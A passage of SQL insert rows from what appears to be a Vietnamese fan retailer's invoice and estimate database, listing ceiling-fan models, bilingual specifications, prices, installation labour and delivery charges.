(412, 152, 'invoice', 'Quạt trần cánh lớn Essence 3m', '', 1.00, 137750000.00, '', 1, 0, NULL, 0.00),
(413, 153, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 11.00, 5230000.00, '', 1, 0, NULL, 0.00),
(414, 154, 'invoice', 'Quạt gắn tường công nghiệp AirEye', '', 1.00, 36390000.00, '', 1, 0, NULL, 0.00),
(415, 85, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm ', 1.00, 8800000.00, '', 1, 0, NULL, 0.00),
(416, 155, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 BN Maple Wood', 'Sơn Cánh màu Dark Walnut', 2.00, 4760000.00, '', 1, 0, NULL, 0.00),
(417, 86, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Maple Wood (Màu gỗ sáng - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 8800000.00, '', 1, 0, NULL, 0.00),
(418, 156, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Maple Wood (Màu gỗ sáng - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 8800000.00, '', 1, 0, NULL, 0.00),
(419, 157, 'invoice', 'Quạt trần cổ điển MAREILLY 52 Black Wood Metal Blades', '', 1.00, 0.00, '', 1, 0, NULL, 0.00),
(420, 158, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', '', 4.00, 6500000.00, '', 1, 0, NULL, 0.00),
(421, 87, 'estimate', 'Quạt trần SINO LED 52 White Wood', 'Chất liệu cánh gỗ tự nhiên<br />\r\nMàu Maple Wood<br />\r\nĐộng cơ DC, 35W<br />\r\nThân màu: Trắng<br />\r\nSải cánh: 132cm<br />\r\nĐiều khiển từ xa đi kèm', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(423, 160, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Maple wood (Màu gỗ sáng - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 8800000.00, '', 1, 0, NULL, 0.00),
(424, 161, 'invoice', 'Haiku L 44 inch Black', 'Sải cánh 112cm <br />\r\nMàu Đen<br />\r\nĐộng cơ EC motor, công suất 29.3W<br />\r\nĐèn LED Kits bao gồm<br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm', 1.00, 18500000.00, '', 1, 0, NULL, 0.00),
(425, 161, 'invoice', 'Nhân công lắp đặt trần bê tông', 'Lắp đặt 400k/bộ trần tấm thạch cao', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(428, 162, 'invoice', 'Quạt gắn tường công nghiệp AirEye', '', 1.00, 61065000.00, '', 1, 0, NULL, 0.00),
(429, 163, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 6600000.00, '', 1, 0, NULL, 0.00),
(430, 164, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 BN Maple Wood', 'Model: DCF-FS52930-60 <br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.52 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm ', 1.00, 8800000.00, '', 1, 0, NULL, 0.00),
(432, 165, 'invoice', 'Quạt trần SINO LED 52 White Wood', 'Chất liệu cánh gỗ tự nhiên<br />\r\nMàu Maple Wood<br />\r\nĐộng cơ DC, 35W<br />\r\nThân màu: Trắng<br />\r\nSải cánh: 132cm<br />\r\nĐiều khiển từ xa đi kèm', 1.00, 6300000.00, '', 1, 0, NULL, 0.00),
(433, 159, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', '', 1.00, 0.00, '', 1, 0, NULL, 0.00),
(434, 166, 'invoice', 'Bộ điều khiển AC gắn tường vuông 3 tốc độ Tổ chức đào tạo WIT', '', 9.00, 250000.00, '', 1, 0, NULL, 0.00),
(435, 88, 'estimate', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm<br />\r\nMàu sắc cánh: Maple Wood<br />\r\nMàu sắc thân quạt: White<br />\r\nĐộng cơ DC, BLDC, công suất 35W<br />\r\nĐiều khiển DC 5 tốc độ', 5.00, 4180000.00, '', 1, 0, NULL, 0.00),
(437, 168, 'invoice', 'Quạt trần SINO LED 52 White Wood', 'Sải cánh 132cm<br />\r\nMàu sắc cánh: Maple Wood<br />\r\nMàu sắc thân quạt: White<br />\r\nĐộng cơ DC, BLDC, công suất 35W<br />\r\nĐiều khiển DC 5 tốc độ', 5.00, 4180000.00, '', 1, 0, NULL, 0.00),
(438, 89, 'estimate', 'Haiku 60 inch Cocoa Bamboo', 'Sải cánh 150cm<br />\r\nĐộng cơ EC, công suất 29.3W<br />\r\nĐiều khiển từ xa tặng kèm, <br />\r\nSenseME Technology, cảm biến môi trường, chuyển động<br />\r\nMàu cánh Cocoa Bamboo<br />\r\nMàu thân quạt: Black', 2.00, 32000000.00, '', 1, 0, NULL, 0.00),
(439, 89, 'estimate', 'Haiku I 60 inch Black with SenseME', 'Sải cánh 150cm<br />\r\nĐộng cơ EC, công suất 29.3W<br />\r\nĐiều khiển từ xa tặng kèm, <br />\r\nSenseME Technology, cảm biến môi trường, chuyển động<br />\r\nMàu cánh Matrix Composite -Màu Đen<br />\r\nMàu thân quạt: Black', 2.00, 29600000.00, '', 2, 0, NULL, 0.00),
(440, 89, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Lắp đặt miễn phí (nguồn điện cấp sẳn)', 1.00, 0.00, '', 3, 0, NULL, 0.00),
(441, 169, 'invoice', 'Haiku 60 inch Cocoa/Caramel Bamboo', 'Sải cánh 150cm<br />\r\nĐộng cơ EC, công suất 29.3W<br />\r\nĐiều khiển từ xa tặng kèm, <br />\r\nSenseME Technology, cảm biến môi trường, chuyển động<br />\r\nMàu cánh Cocoa Bamboo<br />\r\nMàu thân quạt: Black', 3.00, 32000000.00, '', 1, 0, NULL, 0.00),
(442, 169, 'invoice', 'Haiku I 60 inch Black with SenseME', 'Sải cánh 150cm<br />\r\nĐộng cơ EC, công suất 29.3W<br />\r\nĐiều khiển từ xa tặng kèm, <br />\r\nSenseME Technology, cảm biến môi trường, chuyển động<br />\r\nMàu cánh Matrix Composite -Màu Đen<br />\r\nMàu thân quạt: Black', 2.00, 29600000.00, '', 2, 0, NULL, 0.00),
(443, 169, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Lắp đặt miễn phí (nguồn điện cấp sẳn)', 7.00, 0.00, '', 3, 0, NULL, 0.00),
(444, 169, 'invoice', 'Haiku I 60 inch White with SenseME', 'Sải cánh 150cm<br />\r\nĐộng cơ EC, công suất 29.3W<br />\r\nĐiều khiển từ xa tặng kèm, <br />\r\nSenseME Technology, cảm biến môi trường, chuyển động<br />\r\nMàu cánh Matrix Composite -Màu Trắng<br />\r\nMàu thân quạt: Trắng', 2.00, 29600000.00, '', 4, 0, NULL, 0.00),
(445, 89, 'estimate', 'Haiku I 60 inch White with SenseME', 'Sải cánh 150cm<br />\r\nĐộng cơ EC, công suất 29.3W<br />\r\nĐiều khiển từ xa tặng kèm, <br />\r\nSenseME Technology, cảm biến môi trường, chuyển động<br />\r\nMàu cánh Matrix Composite -Màu White<br />\r\nMàu thân quạt: White', 4.00, 29600000.00, '', 4, 0, NULL, 0.00),
(446, 170, 'invoice', 'Bộ điều khiển AC 3 tốc độ Tổ chức đào tạo WIT', 'Thay bộ điều khiển 3 tốc độ cho quạt Hunter', 1.00, 300000.00, '', 1, 0, NULL, 0.00),
(447, 170, 'invoice', 'Quạt trần HAMACHI 52 LED KOA', 'Số Cánh Quạt: 5 cánh <br />\r\nChất liệu cánh: Nhựa ABS <br />\r\nMàu sắc cánh: Black/KOA(vân gỗ) <br />\r\nMàu sắc động cơ: Black <br />\r\nNguồn Điện: 220V/50-60Hz <br />\r\nAir Flow (High Speed): 390 m3/min <br />\r\nĐiều Khiển: Remote Control DC 6 cấp độ kèm theo, sử dụng quay đổi chiều trực tiếp trên điều khiển  <br />\r\nCông Suất Động Cơ: 38W (DC tiêu chuẩn tiết kiệm điện, sử dụng công nghệ BLDC). <br />\r\nBộ LED: Led kit 18W với 3 chế độ màu (trắng - vàng - trung tính)  <br />\r\nSải Cánh (Đường Kính): 56inch/1420mm <br />\r\nThương hiệu/Xuất xứ: Mountain Air/China', 1.00, 3350000.00, '', 2, 0, NULL, 0.00),
(448, 171, 'invoice', 'Bộ điều khiển DC 6 tốc độ Mountair Air', 'Tay cầm điều khiển DC', 1.00, 350000.00, '', 1, 0, NULL, 0.00),
(450, 90, 'estimate', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m5', 'Sải cánh 2,5m <br />\r\nMàu cánh : Bạc Aluminium<br />\r\nMàu thân: Đen<br />\r\nĐộng cơ : DC, BLDC, công suất 84W<br />\r\nSố cánh: 7 cánh nhôm<br />\r\nĐiều khiển từ xa đi kèm<br />\r\nThương hiệu: SUNON/Taiwan', 2.00, 29000000.00, '', 1, 0, NULL, 0.00),
(451, 91, 'estimate', 'Haiku 60 inch White Aluminium', 'MODEL: S3150-X2-AW-04-02-C-01-<br />\r\nF259 - Haiku in White Aluminum\"<br />\r\nDiameter: 60 inch (S3150-AW)<br />\r\nĐường kính cánh: 1520mm<br />\r\nAirfoil Finishes Color: White Aluminum<br />\r\nMàu sác cánh: White Aluminum<br />\r\nHardware Finishe Color: White<br />\r\nMàu sác thân: Trắng<br />\r\nMotor : High-efficiency, brushless DC/EC motor<br />\r\nĐộng cơ: tiêu chuẩn tiết kiệm điện, DC/EC <br />\r\n\"Onboard Sensors: Temperature, humidity, and<br />\r\nmotion sensors enable<br />\r\nSenseME Technology\"<br />\r\nBộ cảm biến tích hợp, kiểm soát nhiệt độ, độ ẩm, cảm biến chuyển động thông qua công nghệ SenseME<br />\r\nEnvironment: Indoor<br />\r\nMôi trường sử dụng: Trong Nhà<br />\r\nAccessories: Remote Control 7 speed<br />\r\nBộ điều khiển từ xa  7 tốc độ đi kèm gắn tường/cầm tay<br />\r\nMount: Universal<br />\r\nMóc treo sử dụng ống ty nối dài mở rộng thêm tuỳ chọn<br />\r\nWeight: 17.5 lb (8 kg)<br />\r\nTrọng lượng: 8kg<br />\r\nMax Speed: 200 RPM<br />\r\nTốc độ quay tối đa: 200RPM<br />\r\nAirflow Min/ Max: 1,194 / 8,629 cfm<br />\r\nHiệu suất luồng gió Min/Max: 1,194 / 8,629 CFM<br />\r\nOperating Voltage: 200-240 VAC, 1 Φ, 50–60 Hz<br />\r\nNguồn điện: 200-240 VAC, 1 Φ, 50–60 Hz<br />\r\nAmbient Operational Temperature: 0° to 40° C<br />\r\nNhiệt độ hoạt động: 0° đến 40° C<br />\r\nSound Level: &lt;35dBa<br />\r\nĐộ ồn quay ở tốc độ cao: &lt;35dBa<br />\r\nBrandneme/Original: Haiku of Big Ass Fans/USA<br />\r\nThương hiệu/xuất xứ: Haiku/Product of USA', 1.00, 79000000.00, '', 1, 0, NULL, 0.00),
(452, 91, 'estimate', 'Nhân công lắp đặt trần bê tông', 'Chi phí lắp đặt MIỄN PHÍ (chưa bao gồm đi nguồn điện, gia cố móc treo có sẳn)', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(453, 172, 'invoice', 'Haiku 60 inch White Aluminium', 'MODEL: S3150-X2-AW-04-02-C-01-<br />\r\nF259 - Haiku in White Aluminum\"<br />\r\nDiameter: 60 inch (S3150-AW)<br />\r\nĐường kính cánh: 1520mm<br />\r\nAirfoil Finishes Color: White Aluminum<br />\r\nMàu sác cánh: White Aluminum<br />\r\nHardware Finishe Color: White<br />\r\nMàu sác thân: Trắng<br />\r\nMotor : High-efficiency, brushless DC/EC motor<br />\r\nĐộng cơ: tiêu chuẩn tiết kiệm điện, DC/EC <br />\r\n\"Onboard Sensors: Temperature, humidity, and<br />\r\nmotion sensors enable<br />\r\nSenseME Technology\"<br />\r\nBộ cảm biến tích hợp, kiểm soát nhiệt độ, độ ẩm, cảm biến chuyển động thông qua công nghệ SenseME<br />\r\nEnvironment: Indoor<br />\r\nMôi trường sử dụng: Trong Nhà<br />\r\nAccessories: Remote Control 7 speed<br />\r\nBộ điều khiển từ xa  7 tốc độ đi kèm gắn tường/cầm tay<br />\r\nMount: Universal<br />\r\nMóc treo sử dụng ống ty nối dài mở rộng thêm tuỳ chọn<br />\r\nWeight: 17.5 lb (8 kg)<br />\r\nTrọng lượng: 8kg<br />\r\nMax Speed: 200 RPM<br />\r\nTốc độ quay tối đa: 200RPM<br />\r\nAirflow Min/ Max: 1,194 / 8,629 cfm<br />\r\nHiệu suất luồng gió Min/Max: 1,194 / 8,629 CFM<br />\r\nOperating Voltage: 200-240 VAC, 1 Φ, 50–60 Hz<br />\r\nNguồn điện: 200-240 VAC, 1 Φ, 50–60 Hz<br />\r\nAmbient Operational Temperature: 0° to 40° C<br />\r\nNhiệt độ hoạt động: 0° đến 40° C<br />\r\nSound Level: &lt;35dBa<br />\r\nĐộ ồn quay ở tốc độ cao: &lt;35dBa<br />\r\nBrandneme/Original: Haiku of Big Ass Fans/USA<br />\r\nThương hiệu/xuất xứ: Haiku/Product of USA', 1.00, 79000000.00, '', 1, 0, NULL, 0.00),
(454, 172, 'invoice', 'Nhân công lắp đặt trần bê tông', 'Chi phí lắp đặt MIỄN PHÍ (chưa bao gồm đi nguồn điện, gia cố móc treo có sẳn)', 1.00, 0.00, '', 2, 0, NULL, 0.00),
(458, 92, 'estimate', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m5', 'Đường kính cánh:  8ft ft (2.4 m)<br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum<br />\r\nTốc độ quay tối đa / Max Speed:  95 RPM (max speed)<br />\r\nNguồn điện / Input Power: 220-240 VAC, 1Φ, 50/60 Hz<br />\r\nĐiều khiển / Control: Remote Control for Wall<br />\r\nĐộ ồn / Sound at Max Speed: &lt;35 dBA<br />\r\nTrọng lượng: 18 kg<br />\r\nDiện tích bao phủ mát / Max Affected Area: 1,722 ft2 / 160 m2<br />\r\nLưu lượng luồng gió: 24,500 CFM (41,596 m3/h)<br />\r\n<br />\r\nCông suất động cơ / Power Consumption: 84 W (tiết kiệm điện 90% so với động cơ AC thường ở cùng sải cánh)<br />\r\nĐẶT ĐIỂM CHUNG - QUẠT TRẦN POWERFUL S1<br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum<br />\r\nPhụ kiện an toàn kèm theo, bộ phụ kiện lắp cánh quạt đã bao gồm<br />\r\nTuỳ chọn: điều khiển Modbus quản lý tập trung BMS. Liên hệ nhà cung cấp tư vấn<br />\r\nThương hiệu: SUNON/ Taiwan (thiết kế sản xuất 100% Taiwan)', 1.00, 29000000.00, '', 1, 0, NULL, 0.00),
(459, 92, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Nhân công gia cố móc treo quạt trần - <br />\r\nLiên hệ lắp đặt 0913579511', 1.00, 1500000.00, '', 2, 0, NULL, 0.00),
(460, 92, 'estimate', 'Chi phí vận chuyển tới chân công trình', 'Vận chuyển giao hàng tại nhà', 1.00, 500000.00, 'lots', 3, 0, NULL, 0.00),
(461, 173, 'invoice', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m5', 'Đường kính cánh:  8ft ft (2.4 m)<br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum<br />\r\nTốc độ quay tối đa / Max Speed:  95 RPM (max speed)<br />\r\nNguồn điện / Input Power: 220-240 VAC, 1Φ, 50/60 Hz<br />\r\nĐiều khiển / Control: Remote Control for Wall<br />\r\nĐộ ồn / Sound at Max Speed: &lt;35 dBA<br />\r\nTrọng lượng: 18 kg<br />\r\nDiện tích bao phủ mát / Max Affected Area: 1,722 ft2 / 160 m2<br />\r\nLưu lượng luồng gió: 24,500 CFM (41,596 m3/h)<br />\r\n<br />\r\nCông suất động cơ / Power Consumption: 84 W (tiết kiệm điện 90% so với động cơ AC thường ở cùng sải cánh)<br />\r\nĐẶT ĐIỂM CHUNG - QUẠT TRẦN POWERFUL S1<br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum<br />\r\nPhụ kiện an toàn kèm theo, bộ phụ kiện lắp cánh quạt đã bao gồm<br />\r\nTuỳ chọn: điều khiển Modbus quản lý tập trung BMS. Liên hệ nhà cung cấp tư vấn<br />\r\nThương hiệu: SUNON/ Taiwan (thiết kế sản xuất 100% Taiwan)', 1.00, 29000000.00, '', 1, 0, NULL, 0.00),
(462, 173, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Nhân công gia cố móc treo quạt trần - <br />\r\nLiên hệ lắp đặt 0913579511', 1.00, 1500000.00, '', 2, 0, NULL, 0.00),
(463, 173, 'invoice', 'Chi phí vận chuyển tới chân công trình', 'Vận chuyển giao hàng tại nhà', 1.00, 500000.00, 'lots', 3, 0, NULL, 0.00),
(465, 174, 'invoice', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m5', 'Sải cánh 2,5m <br />\r\nMàu cánh : Bạc Aluminium<br />\r\nMàu thân: Đen<br />\r\nĐộng cơ : DC, BLDC, công suất 84W<br />\r\nSố cánh: 7 cánh nhôm<br />\r\nĐiều khiển từ xa đi kèm<br />\r\nThương hiệu: SUNON/Taiwan', 2.00, 29000000.00, '', 1, 0, NULL, 0.00),
(469, 93, 'estimate', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m5', '', 1.00, 29000000.00, '', 1, 0, NULL, 0.00),
(470, 93, 'estimate', 'Chi phí vận chuyển tới chân công trình', 'Vận chuyển tới Hà Nội', 1.00, 800000.00, 'lots', 2, 0, NULL, 0.00),
(471, 175, 'invoice', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m5', 'Đường kính cánh: 8ft ft (2.4 m)<br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum<br />\r\nTốc độ quay tối đa / Max Speed: 95 RPM (max speed)<br />\r\nNguồn điện / Input Power: 220-240 VAC, 1Φ, 50/60 Hz<br />\r\nĐiều khiển / Control: Remote Control for Wall<br />\r\nĐộ ồn / Sound at Max Speed: &lt;35 dBA<br />\r\nTrọng lượng: 18 kg<br />\r\nDiện tích bao phủ mát / Max Affected Area: 1,722 ft2 / 160 m2<br />\r\nLưu lượng luồng gió: 24,500 CFM (41,596 m3/h)<br />\r\n<br />\r\nCông suất động cơ / Power Consumption: 84 W (tiết kiệm điện 90% so với động cơ AC thường ở cùng sải cánh)<br />\r\nĐẶT ĐIỂM CHUNG - QUẠT TRẦN POWERFUL S1<br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum<br />\r\nPhụ kiện an toàn kèm theo, bộ phụ kiện lắp cánh quạt đã bao gồm<br />\r\nTuỳ chọn: điều khiển Modbus quản lý tập trung BMS. Liên hệ nhà cung cấp tư vấn<br />\r\nThương hiệu: SUNON/ Taiwan (thiết kế sản xuất 100% Taiwan)', 1.00, 29000000.00, '', 1, 0, NULL, 0.00),
(472, 175, 'invoice', 'Chi phí vận chuyển tới chân công trình', 'Vận chuyển tới Hà Nội', 1.00, 800000.00, 'lots', 2, 0, NULL, 0.00),
(473, 94, 'estimate', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 7m3', 'Model Number:BCNF1CB288A-01S <br />\r\nProduct Name: POWERFUL SERIES 10 <br />\r\n <br />\r\nMotor and Gearles: Brushless EC motor, IP55 motor, <br />\r\n <br />\r\nSpeed (min/max): 10 / 50 RPM <br />\r\n <br />\r\nWeight: 120.86 kg <br />\r\n <br />\r\nMaximum Rated Current : 8.3 A <br />\r\n <br />\r\nPower consumption (max W): 1,050 W <br />\r\n <br />\r\nInput Condition: 220-240 VAC, 1Φ, 50-60Hz <br />\r\n <br />\r\nFan Weight (trọng lượng): 120.86 kg <br />\r\n <br />\r\nSound at max. Speed (độ ồn): &lt;46 dB(A) <br />\r\n <br />\r\nMax Airflow: 338,127 CFM (574,069 m3/h) <br />\r\n <br />\r\nMax Affected Area: 2,612 m2 <br />\r\n <br />\r\nAirfoil finish (số cánh): 07 blades with aluminimum color <br />\r\n <br />\r\nColor: Airfoil:Silver , Winglet:Black <br />\r\n <br />\r\nMounting components: 1m Extension tube length <br />\r\n <br />\r\nController: Knob Wall Controller mounted <br />\r\n <br />\r\nFan Diameter: 24ft (7.3m) <br />\r\n <br />\r\nBảo hành (Warranty): 03 years <br />\r\n <br />\r\nThương hiệu: SUNON/Taiwan - sản xuất 100% Đài Loan', 2.00, 103000000.00, '', 1, 0, NULL, 0.00),
(474, 94, 'estimate', 'Chi phí vận chuyển tới chân công trình', 'Phí vận chuyển giao hàng từ Cát Lái - nhà thờ', 2.00, 1500000.00, 'lots', 2, 0, NULL, 0.00),
(475, 94, 'estimate', 'Nhân công lắp đặt trần', 'Phí nhân công lắp đặt (chưa bao gồm vật tư phụ thi công, thuê tháo/ráp giàn giáo, dây nguồn điện)', 2.00, 1500000.00, '', 3, 0, NULL, 0.00),
(476, 94, 'estimate', 'Gia cố ống ty nối dài - trụ ty dành cho quạt trần công nghiệp', 'Gia cố ống ty nối dài - trụ ống ty sơn đen', 2.00, 2500000.00, 'cái', 4, 0, NULL, 0.00),
(477, 94, 'estimate', 'Chi phí nhân công đi lại quản lý, hướng dẫn vận hành, lắp đặt', 'Chi phí nhân công đi lại quản lý, hướng dẫn vận hành, lắp đặt', 2.00, 3000000.00, 'lots', 5, 0, NULL, 0.00),
(478, 176, 'invoice', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 7m3', 'Model Number:BCNF1CB288A-01S <br />\r\nProduct Name: POWERFUL SERIES 10 <br />\r\n <br />\r\nMotor and Gearles: Brushless EC motor, IP55 motor, <br />\r\n <br />\r\nSpeed (min/max): 10 / 50 RPM <br />\r\n <br />\r\nWeight: 120.86 kg <br />\r\n <br />\r\nMaximum Rated Current : 8.3 A <br />\r\n <br />\r\nPower consumption (max W): 1,050 W <br />\r\n <br />\r\nInput Condition: 220-240 VAC, 1Φ, 50-60Hz <br />\r\n <br />\r\nFan Weight (trọng lượng): 120.86 kg <br />\r\n <br />\r\nSound at max. Speed (độ ồn): &lt;46 dB(A) <br />\r\n <br />\r\nMax Airflow: 338,127 CFM (574,069 m3/h) <br />\r\n <br />\r\nMax Affected Area: 2,612 m2 <br />\r\n <br />\r\nAirfoil finish (số cánh): 07 blades with aluminimum color <br />\r\n <br />\r\nColor: Airfoil:Silver , Winglet:Black <br />\r\n <br />\r\nMounting components: 1m Extension tube length <br />\r\n <br />\r\nController: Knob Wall Controller mounted <br />\r\n <br />\r\nFan Diameter: 24ft (7.3m) <br />\r\n <br />\r\nBảo hành (Warranty): 03 years <br />\r\n <br />\r\nThương hiệu: SUNON/Taiwan - sản xuất 100% Đài Loan', 2.00, 103000000.00, '', 1, 0, NULL, 0.00),
(479, 176, 'invoice', 'Chi phí vận chuyển tới chân công trình', 'Phí vận chuyển giao hàng từ Cát Lái - nhà thờ', 2.00, 1500000.00, 'lots', 2, 0, NULL, 0.00),
(480, 176, 'invoice', 'Nhân công lắp đặt trần', 'Phí nhân công lắp đặt (chưa bao gồm vật tư phụ thi công, thuê tháo/ráp giàn giáo, dây nguồn điện)', 2.00, 1500000.00, '', 3, 0, NULL, 0.00),
(481, 176, 'invoice', 'Gia cố ống ty nối dài - trụ ty dành cho quạt trần công nghiệp', 'Gia cố ống ty nối dài - trụ ống ty sơn đen', 2.00, 2500000.00, 'cái', 4, 0, NULL, 0.00),
(482, 176, 'invoice', 'Chi phí nhân công đi lại quản lý, hướng dẫn vận hành, lắp đặt', 'Chi phí nhân công đi lại quản lý, hướng dẫn vận hành, lắp đặt', 2.00, 3000000.00, 'lots', 5, 0, NULL, 0.00),
